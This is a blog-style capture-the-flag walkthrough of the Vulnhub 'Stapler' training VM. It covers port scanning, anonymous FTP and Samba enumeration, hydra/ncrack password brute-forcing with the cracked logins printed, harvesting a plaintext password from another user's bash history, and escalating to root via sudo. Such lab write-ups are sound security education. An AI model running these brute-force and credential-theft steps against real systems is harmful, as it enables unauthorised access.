Vulnhub Stapler
Vulnhub
Stapler
Another day another machine
Let’s start with our nmap scan
nmap -sS -sC -A -Pn -T 4 -p- 192.168.1.124
While that is running let’s see if they have a website.
So we got a lot of ports open.
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: Can't parse PASV response: "Permission denied."
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)
|_ 256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)
53/tcp open domain dnsmasq 2.75
| dns-nsid:
|_ bind.version: dnsmasq-2.75
80/tcp open http
123/tcp closed ntp
137/tcp closed netbios-ns
138/tcp closed netbios-dgm
139/tcp open netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
666/tcp open doom?
| fingerprint-strings:
| NULL:
| message2.jpgUT
| QWux
| "DL[E
| #;3[
| \xf6
| u([r
| qYQq
| Y_?n2
| 3&M~{
| 9-a)T
| L}AJ
|_ .npy.9
3306/tcp open mysql MySQL 5.7.12-0ubuntu1
| mysql-info:
| Protocol: 10
| Version: 5.7.12-0ubuntu1
| Thread ID: 7
| Capabilities flags: 63487
| Some Capabilities: Support41Auth, Speaks41ProtocolOld, ODBCClient, LongPassword, ConnectWithDatabase, Speaks41ProtocolNew, IgnoreSigpipes, LongColumnFlag, SupportsLoadDataLocal, FoundRows, InteractiveClient, IgnoreSpaceBeforeParenthesis, SupportsTransactions, SupportsCompression, DontAllowDatabaseTableColumn, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
| Status: Autocommit
| Salt: 0sEX\x1FE*s(X\x1Ao)P]\x1EZ:h^
|_ Auth Plugin Name: 88
12380/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Tim, we need to-do better next year for Initech
We got an open ftp, Samba shares, doom? with a cryptic message, msql and another website beside the one on 80. Let’s start with the website.
Website
If we browse the second website at look at the source code, there’s an base64 encode image. Let’s decode that.
To decode we simply take the code of the image and paste it in a website like http://codebeautify.org/base64-to-image-converter
Alright…
I’ll try a google inverse search and nothing. Let’s look at the other stuff.
But apparently Zoe wants to hire people. And in the header response there’s
Dave: Soemthing doesn’t look right here.
Nikto
Let’s run nikto
nikto -h 192.168.1.124
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.1.124
+ Target Hostname: 192.168.1.124
+ Target Port: 80
+ Start Time: 2017-05-18 10:27:28 (GMT-4)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-3093: /.bashrc: User home dir was found with a shell rc file. This may reveal file and path information.
+ OSVDB-3093: /.profile: User home dir with a shell profile was found. May reveal directory information and system configuration.
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated: 20 error(s) and 5 item(s) reported on remote host
+ End Time: 2017-05-18 10:27:37 (GMT-4) (9 seconds)
---------------------------------------------------------------------------
Wait what…? Bashrc ?
wget 192.168.1.124/.bashrc
wget 192.168.1.124/.profile
Alright, so we got some configuration files…? Doesn’t seem to contain much there’s a alias called alert?
Now nikto on the other website
nikto -h 192.168.1.124:12380
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.1.124
+ Target Hostname: 192.168.1.124
+ Target Port: 12380
---------------------------------------------------------------------------
+ SSL Info: Subject: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/[email protected]
Ciphers: ECDHE-RSA-AES256-GCM-SHA384
Issuer: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/[email protected]
+ Start Time: 2017-05-18 11:12:26 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x15 0x5347c53a972d1
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'dave' found, with contents: Soemthing doesn't look right here
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/admin112233/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/blogblog/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Hostname '192.168.1.124' does not match certificate's names: Red.Initech
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 7690 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time: 2017-05-18 11:14:13 (GMT-4) (107 seconds)
---------------------------------------------------------------------------
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
Interesting stuff. We got some folders there. I keep getting a 400 Bad Request for every folder that i’m trying to browse…
3 hours later ….FUCK i had to use https this sucks. I had low privelege shell when i found that about the https.
Weird but let’s move on and see other stuff.
FTP
Let’s log on their ftp.
ftp 192.168.1.124
Connected to 192.168.1.124.
220-
220-|-----------------------------------------------------------------------------------------|
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
220-|-----------------------------------------------------------------------------------------|
220-
220
Name (192.168.1.124:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 107 Jun 03 2016 note
226 Directory send OK.
ftp> get note
local: note remote: note
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note (107 bytes).
226 Transfer complete.
107 bytes received in 0.00 secs (90.2351 kB/s)
ftp> quit
221 Goodbye.
cat note
Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.
Ummm, alright Elly and John. Payload information.
Let’s look at the version of vstfpd 2.0.8 in searchsploit
searchsploit
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/platforms)
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
vsftpd 2.0.5 - (CWD) Authenticated Remote Memory Consumption Exploit | ./linux/dos/5814.pl
vsftpd 2.3.2 - Denial of Service | ./linux/dos/16270.c
vsftpd 2.3.4 - Backdoor Command Execution | ./unix/remote/17491.rb
vsftpd FTP Server 2.0.5 - 'deny_file' Option Remote Denial of Service (1) | ./windows/dos/31818.sh
vsftpd FTP Server 2.0.5 - 'deny_file' Option Remote Denial of Service (2) | ./windows/dos/31819.pl
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
Nothing matches our version, but i’m curious another the 17491.rb
This module exploits a malicious backdoor that was added to the VSFTPD download
archive. This backdoor was introdcued into the vsftpd-2.3.4.tar.gz archive between
June 30th 2011 and July 1st 2011 according to the most recent information
available. This backdoor was removed on July 3rd 2011.
}
So i guess that’s that.
I let a hydra/ncrack run trying to bruteforce it and got some hits.
Starting Ncrack 0.5 ( http://ncrack.org ) at 2017-05-18 14:13 EDT
Discovered credentials for ftp on 192.168.1.124 21/tcp:
192.168.1.124 21/tcp ftp: 'Drew' 'qwerty'
192.168.1.124 21/tcp ftp: 'MFrei' 'letmein'
192.168.1.124 21/tcp ftp: 'JBare' 'cookie'
Samba
We’ll run enum4linux on the machine
enum4linux 192.168.1.124
We got a few hits, let’s try logging into one of them
smbclient //192.168.1.124/kathy -a
WARNING: The "syslog" option is deprecated
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]
smb: \> ls
. D 0 Fri Jun 3 12:52:52 2016
.. D 0 Mon Jun 6 17:39:56 2016
kathy_stuff D 0 Sun Jun 5 11:02:27 2016
backup D 0 Sun Jun 5 11:04:14 2016
19478204 blocks of size 1024. 16395444 blocks available
smb: \> cd backup
smb: \backup\> ls
. D 0 Sun Jun 5 11:04:14 2016
.. D 0 Fri Jun 3 12:52:52 2016
vsftpd.conf N 5961 Sun Jun 5 11:03:45 2016
wordpress-4.tar.gz N 6321767 Mon Apr 27 13:14:46 2015
19478204 blocks of size 1024. 16395444 blocks available
smb: \backup\> get vsdftpd.conf
smb: \backup\> cd ..
smb: \> cd kathy_stuff
smb: \kathy_stuff\> ls
. D 0 Sun Jun 5 11:02:27 2016
.. D 0 Fri Jun 3 12:52:52 2016
todo-list.txt N 64 Sun Jun 5 11:02:27 2016
19478204 blocks of size 1024. 16395456 blocks available
smb: \kathy_stuff\> get todo-list.txt
So we took both files that look interesting in kathy share.
cat todo-list.txt
I'm making sure to backup anything important for Initech, Kathy
Alright Kathy. So see what’s in tmp
smbclient //192.168.1.124/tmp
smb: \> ls
. D 0 Tue Jun 7 04:08:39 2016
.. D 0 Mon Jun 6 17:39:56 2016
ls N 274 Sun Jun 5 11:32:58 2016
19478204 blocks of size 1024. 16395452 blocks available
smb: \> get ls
cat ls
.:
total 12.0K
drwxrwxrwt 2 root root 4.0K Jun 5 16:32 .
drwxr-xr-x 16 root root 4.0K Jun 3 22:06 ..
-rw-r--r-- 1 root root 0 Jun 5 16:32 ls
drwx------ 3 root root 4.0K Jun 5 15:32 systemd-private-df2bff9b90164a2eadc490c0b8f76087-systemd-timesyncd.service-vFKoxJ
Alright…
Next
SSH
So when i used enum4linux, it gaves us a list of users on the computer.
S-1-22-1-1000 Unix User\peter (Local User)
S-1-22-1-1001 Unix User\RNunemaker (Local User)
S-1-22-1-1002 Unix User\ETollefson (Local User)
S-1-22-1-1003 Unix User\DSwanger (Local User)
S-1-22-1-1004 Unix User\AParnell (Local User)
S-1-22-1-1005 Unix User\SHayslett (Local User)
S-1-22-1-1006 Unix User\MBassin (Local User)
S-1-22-1-1007 Unix User\JBare (Local User)
S-1-22-1-1008 Unix User\LSolum (Local User)
S-1-22-1-1009 Unix User\IChadwick (Local User)
S-1-22-1-1010 Unix User\MFrei (Local User)
S-1-22-1-1011 Unix User\SStroud (Local User)
S-1-22-1-1012 Unix User\CCeaser (Local User)
S-1-22-1-1013 Unix User\JKanode (Local User)
S-1-22-1-1014 Unix User\CJoo (Local User)
S-1-22-1-1015 Unix User\Eeth (Local User)
S-1-22-1-1016 Unix User\LSolum2 (Local User)
S-1-22-1-1017 Unix User\JLipps (Local User)
S-1-22-1-1018 Unix User\jamie (Local User)
S-1-22-1-1019 Unix User\Sam (Local User)
S-1-22-1-1020 Unix User\Drew (Local User)
S-1-22-1-1021 Unix User\jess (Local User)
S-1-22-1-1022 Unix User\SHAY (Local User)
S-1-22-1-1023 Unix User\Taylor (Local User)
S-1-22-1-1024 Unix User\mel (Local User)
S-1-22-1-1025 Unix User\kai (Local User)
S-1-22-1-1026 Unix User\zoe (Local User)
S-1-22-1-1027 Unix User\NATHAN (Local User)
S-1-22-1-1028 Unix User\www (Local User)
S-1-22-1-1029 Unix User\elly (Local User)
I decided to try to bruteforce it with hydra.
I gitclone https://github.com/danielmiessler/SecLists and used the 500-worst-passwords.txt as a wordlist for my hydra attack.
I also created a username list file containing the username from enum4linux.
hydra -L ~/stapler/usernames.txt -P ~/wordlists/passwords/500-worst-passwords.txt 192.168.1.124 ssh
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] max 16 tasks per 1 server, overall 64 tasks, 14970 login tries (l:30/p:499), ~14 tries per task
[DATA] attacking service ssh on port 22
[STATUS] 242.00 tries/min, 242 tries in 00:01h, 14728 to do in 01:01h, 16 active
[STATUS] 222.33 tries/min, 667 tries in 00:03h, 14303 to do in 01:05h, 16 active
[STATUS] 214.29 tries/min, 1500 tries in 00:07h, 13470 to do in 01:03h, 16 active
[STATUS] 212.07 tries/min, 3181 tries in 00:15h, 11789 to do in 00:56h, 16 active
[22][ssh] host: 192.168.1.124 login: JBare password: cookie
[22][ssh] host: 192.168.1.124 login: MFrei password: letmein
15 minutes in we already had some hits, i tried both and they worked. We’re in boys!
Enumeration
We’re in the system, let’s start with uname
uname -a
Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
Searchsploit only shows an exploit for x64, we got a x86.
Went to see the /etc/passwd and we can see that indeed there’s a lot of users.
Let’s see the /home/ directory and look at all the files
cd /home
find . | less
A quick peek a the result and we can see something very interesting
find . | grep sudo
./peter/.sudo_as_admin_successful
Peter can run sudo as admin.
Let’s grep for the word peter in /home
grep -ri peter
grep: MFrei/.viminfo: Permission denied
grep: MFrei/.cache: Permission denied
grep: MFrei/.lesshst: Permission denied
grep: Drew/.cache: Permission denied
grep: peter/.viminfo: Permission denied
grep: peter/.bash_history: Permission denied
grep: peter/.cache: Permission denied
JKanode/.bash_history:sshpass -p JZQuyIN5 peter@localhost
That looks like a password.
su peter
It will ask you a bunch of question because of the empty configuration file. Just answer them and you’ll get a zsh shell.
/bin/bash
sudo passwd root
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
peter@red:/home$ su root
Password:
➜ /home id
uid=0(root) gid=0(root) groups=0(root)
➜ /home
And there is it.
Processes
Here’s a step that i did but couldn’t find a way to get root. Let’s look at all the processes
ps -aux | less
root 736 0.0 0.1 2244 1324 ? Ss May18 0:00 /usr/sbin/acpid
root 738 0.0 0.3 20352 3396 ? Ssl May18 0:00 /usr/bin/lxcfs /var/lib/lxcfs/
syslog 740 0.0 0.2 30728 2984 ? Ssl May18 0:03 /usr/sbin/rsyslogd -n
message+ 748 0.0 0.3 5932 3476 ? Ss May18 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
root 758 0.0 0.2 4076 2780 ? Ss May18 0:00 /lib/systemd/systemd-logind
root 765 0.0 0.2 5576 2652 ? Ss May18 0:00 /usr/sbin/cron -f
daemon 770 0.0 0.1 3480 1924 ? Ss May18 0:00 /usr/sbin/atd -f
root 788 0.0 0.0 3132 128 ? Ss May18 0:00 /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog
dnsmasq 801 0.0 0.2 9116 2628 ? S May18 0:00 /usr/sbin/dnsmasq -x /var/run/dnsmasq/dnsmasq.pid -u dnsmasq -7 /etc/dnsmasq.d,.dpkg-dist,.dpkg-old,.dpkg-new --loca
l-service --trust-anchor=.,19036,8,2,49AAC11D7B6F6446702E54A1607371607A1A41855200FD2CE1CDDE32F24E8FB5
root 898 0.0 0.4 10104 4792 ? Ss May18 0:02 /usr/sbin/sshd -D
root 915 0.0 0.2 5308 2684 ? Ss May18 0:01 /usr/sbin/vsftpd /etc/vsftpd.conf
mysql 934 0.0 65.3 1228196 668788 ? Ssl May18 0:05 /usr/sbin/mysqld
root 936 0.0 0.0 2984 120 ? Ss May18 0:00 /sbin/iscsid
root 937 0.0 0.2 3444 2756 ? S<Ls May18 0:02 /sbin/iscsid
root 1047 0.0 0.1 2540 1564 ? S May18 0:00 /usr/sbin/inetutils-inetd
root 1083 0.0 2.2 127044 23052 ? Ss May18 0:00 php-fpm: master process (/etc/php/7.0/fpm/php-fpm.conf)
www-data 1108 0.0 0.5 127044 5500 ? S May18 0:00 php-fpm: pool www
www-data 1109 0.0 0.5 127044 5524 ? S May18 0:00 php-fpm: pool www
root 1110 0.0 2.4 127368 25000 ? Ss May18 0:00 /usr/sbin/apache2 -k start
root 1123 0.0 0.5 26228 5264 ? Ss May18 0:00 /usr/sbin/nmbd -D
root 1138 0.0 1.1 42308 11664 ? Ss May18 0:00 /usr/sbin/smbd -D
root 1139 0.0 0.4 40464 4464 ? S May18 0:00 /usr/sbin/smbd -D
root 1141 0.0 0.5 42308 5876 ? S May18 0:00 /usr/sbin/smbd -D
root 1283 0.0 0.0 6008 580 ? Ss May18 0:00 dhclient enp0s3
root 1308 0.0 0.2 34088 2312 ? Ss May18 0:00 /usr/lib/postfix/sbin/master
postfix 1310 0.0 0.2 34168 2456 ? S May18 0:00 qmgr -l -t unix -u
root 1328 0.0 0.2 5720 2892 ? S May18 0:00 /bin/bash /root/python.sh
root 1330 0.0 0.2 5724 2728 ? S May18 0:00 /bin/bash /usr/local/src/nc.sh
root 1332 0.0 0.3 6472 3228 ? S May18 0:00 su -c authbind php -S 0.0.0.0:80 -t /home/www/ &>/dev/null www
root 1342 0.0 0.3 6472 3200 ? S May18 0:00 su -c cd /home/JKanode; python2 -m SimpleHTTPServer 8888 &>/dev/null JKanode
root 1343 0.0 0.1 4748 1608 tty1 Ss+ May18 0:00 /sbin/agetty --noclear tty1 linux
JKanode 1348 0.0 0.3 6372 3864 ? Ss May18 0:00 /lib/systemd/systemd --user
www 1350 0.0 0.3 6368 3900 ? Ss May18 0:00 /lib/systemd/systemd --user
www 1356 0.0 0.1 7584 1264 ? S May18 0:00 (sd-pam)
JKanode 1362 0.0 0.1 7584 1264 ? S May18 0:00 (sd-pam)
www 1365 0.0 0.2 5432 2768 ? Ss May18 0:00 bash -c authbind php -S 0.0.0.0:80 -t /home/www/ &>/dev/null
JKanode 1366 0.0 0.2 5436 2832 ? Ss May18 0:00 bash -c cd /home/JKanode; python2 -m SimpleHTTPServer 8888 &>/dev/null
JKanode 1367 0.0 0.8 14696 8656 ? S May18 0:02 python2 -m SimpleHTTPServer 8888
www 1368 0.0 2.0 126124 21360 ? S May18 0:02 php -S 0.0.0.0:80 -t /home/www/
root 2641 0.0 1.0 42572 10516 ? S May18 0:00 /usr/sbin/smbd -D
root 2712 0.0 0.0 2692 692 ? S May18 0:00 nc -nlvp 666
root 3021 0.1 0.0 0 0 ? S May18 0:08 [kworker/u2:1]
postfix 3348 0.0 0.2 34116 3040 ? S May18 0:00 pickup -l -t unix -u -c
root 4553 0.0 0.0 0 0 ? S 00:43 0:00 [kworker/0:0]
root 5431 0.0 0.3 6476 3460 pts/0 S 00:51 0:00 su MFrei
MFrei 5432 0.0 0.3 5868 3432 pts/0 S 00:51 0:00 bash
root 6023 0.0 0.0 0 0 ? S 00:54 0:00 [kworker/u2:2]
:
A lot of good info.
Port 666: I tried connection to the port 666 with ncat but i couldn’t figure out what it did. We can see here that the process is run by root. That’s good info . If we follow the port we can see that it leads to the python.sh and the content of the file looks like
#!/bin/bash
while true; do
(nc -nlvp 666 < /usr/local/src/nc.zip &>/dev/null) && sleep 10s;
done
So it was sending us nc.zip… went back to the kali machine and got the file.
nc 192.168.1.124 > nc.zip
unzip nc.zip
It’s a picture, it contains the contents of the file nc.txt that is located in the same folders, it looks like it’s nothing at all after all.
Decided to run strings/file/exiftool on the picture.
strings message2.jpg
JFIF
vPhotoshop 3.0
8BIM
1If you are reading this, you should get a cookie!
8BIM
$3br
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
#3R
&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
/<}m
>,xr?
u-o[
Sxw]
v;]>
|_m7
l~!|0
<Elu
I[[k:>
>5[^k
;o{o
>xgH
mCXi
PE<R"
umcV
g[Y@=
[\Y_
\Oku
'X|(
?=?i
//Do
1okb
,>,&
n<;oc
*? xC
~ |y
6{M6
p
Nothing but i get a cookie, exiftool and file got nothing good.